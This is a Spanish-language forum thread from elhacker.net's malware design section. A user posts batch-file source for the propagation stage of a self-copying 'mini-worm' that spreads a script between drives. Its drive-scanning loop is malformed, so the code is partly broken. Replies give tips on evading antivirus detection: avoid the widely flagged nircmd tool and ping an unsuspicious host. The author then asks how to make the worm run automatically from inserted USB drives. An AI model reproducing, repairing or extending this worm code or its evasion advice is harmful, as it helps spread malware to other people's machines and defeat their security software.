elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  porfavor den una opinion
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: porfavor den una opinion  (Leído 4,159 veces)
0xDani


Desconectado Desconectado

Mensajes: 1.077



Ver Perfil
porfavor den una opinion
« en: 23 Abril 2012, 20:02 pm »

Bueno he estado intentando crear un mini-gusano (o mejor, practicando batch y pensamiento malicioso a la vez) :¬¬ , y aunque se que seguramente no valdra mucho pido su opinion para tratar de aprender algo.
Lo dejo:
Código:
@echo off
:acb
nircmd wait 150000
if exist %homedrive%"\abc.bat" (goto abc) else goto no
:abc
copy /Y %homedrive%"\abc.bat" "%~d0\" >Nul
nircmd wait 150000
goto acb
:No
if exist %%a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) (goto e) else goto acb
:e
if exist %%a:"\abc.bat" copy /Y %%a:"\abc.bat" %homedrive%
nircmd wait 150000
goto acb

por supuesto esto es solo la parte de la propagacion, y el usar nircmd, un apaño.
Saludos ;D
En línea

I keep searching for something that I never seem to find, but maybe I won't, because I left it all behind!

I code for $$$
Hago trabajos en C/C++
Contactar por PM
Stakewinner00


Desconectado Desconectado

Mensajes: 1.426



Ver Perfil WWW
Re: porfavor den una opinion
« Respuesta #1 en: 23 Abril 2012, 21:40 pm »

no se k es "nircmd" yo hice un gusano mas o menos igual pero con mas sentencias IF
En línea

Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: porfavor den una opinion
« Respuesta #2 en: 23 Abril 2012, 22:02 pm »

Hay formas mejores de simular un sleep en Batch sin usar nircmd... nircmd es muy detectado por los AVs
En línea

$Edu$


Desconectado Desconectado

Mensajes: 1.842



Ver Perfil
Re: porfavor den una opinion
« Respuesta #3 en: 24 Abril 2012, 00:03 am »

Karcrack.. si usaria pings para simular un sleep, por ejemplo:   ping -n 10 localhost>nul

Es detectado por los avs?
En línea

Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: porfavor den una opinion
« Respuesta #4 en: 24 Abril 2012, 12:59 pm »

El problema de nircmd es que es un ejecutable a parte que además está muy taggeado...

No sé nada sobre el análisis heurístico de Batch, pero no creo que un ping tenga nada de maligno... tal vez deberías poner otro host para que no sea tan sospechoso... Aún así la forma lógica y precisa de usar ping para simular un sleep es usando el parámetro w:
Código
  1. ping 1.2.3.4 -n 1 -w %TIEMPO_EN_MILISEGUNDOS% >NUL

Para mi gusto la mejor forma de hacer una pausa es esta (Aunque creo que en W$XP no viene por defecto :¬¬):
Código
  1. waitfor /T %TIEMPO_EN_SEGUNDOS% karcrack_ejemplo >NUL
En línea

$Edu$


Desconectado Desconectado

Mensajes: 1.842



Ver Perfil
Re: porfavor den una opinion
« Respuesta #5 en: 24 Abril 2012, 17:51 pm »

No conocia esa primer forma de simular el sleep, casi todos usan ping -n %tiempo_en_segundos% localhost>nul , por los codigos que he visto desde hace tiempo, pero es todo a confiarse de que cada ping demorara 1 seg, por eso si se hace 10 pings demoraria supuestamente 10 segs, pero nunca estuve del todo seguro, ese que dejas si es preciso y esta bien, Gracias!
En línea

0xDani


Desconectado Desconectado

Mensajes: 1.077



Ver Perfil
Re: porfavor den una opinion
« Respuesta #6 en: 25 Abril 2012, 18:51 pm »

¿Alguien me podria recomendar una forma de hacer que el programa se ejecute cuando se introduzca el pen?He probado con autorun.inf, pero no funciona xk al introducir el pen te sale la ventana preguntandote que quieres hacer(abrir una carpeta,reproducir todo,etc...)
Gracias por sus opiniones y por lo del ping. ;-)
En línea

I keep searching for something that I never seem to find, but maybe I won't, because I left it all behind!

I code for $$$
Hago trabajos en C/C++
Contactar por PM
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
opinion
Diseño Gráfico
blackhold 4 2,783 Último mensaje 26 Octubre 2004, 02:53 am
por Azielito
Opinion
Diseño Gráfico
MinusFour 4 2,572 Último mensaje 22 Noviembre 2004, 15:46 pm
por jvchino
Una opinion... « 1 2 3 »
Programación Visual Basic
ZifuSka 21 7,848 Último mensaje 12 Octubre 2005, 02:08 am
por ZifuSka
opinion
Electrónica
NeBuR85 0 2,107 Último mensaje 29 Diciembre 2005, 22:03 pm
por NeBuR85
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines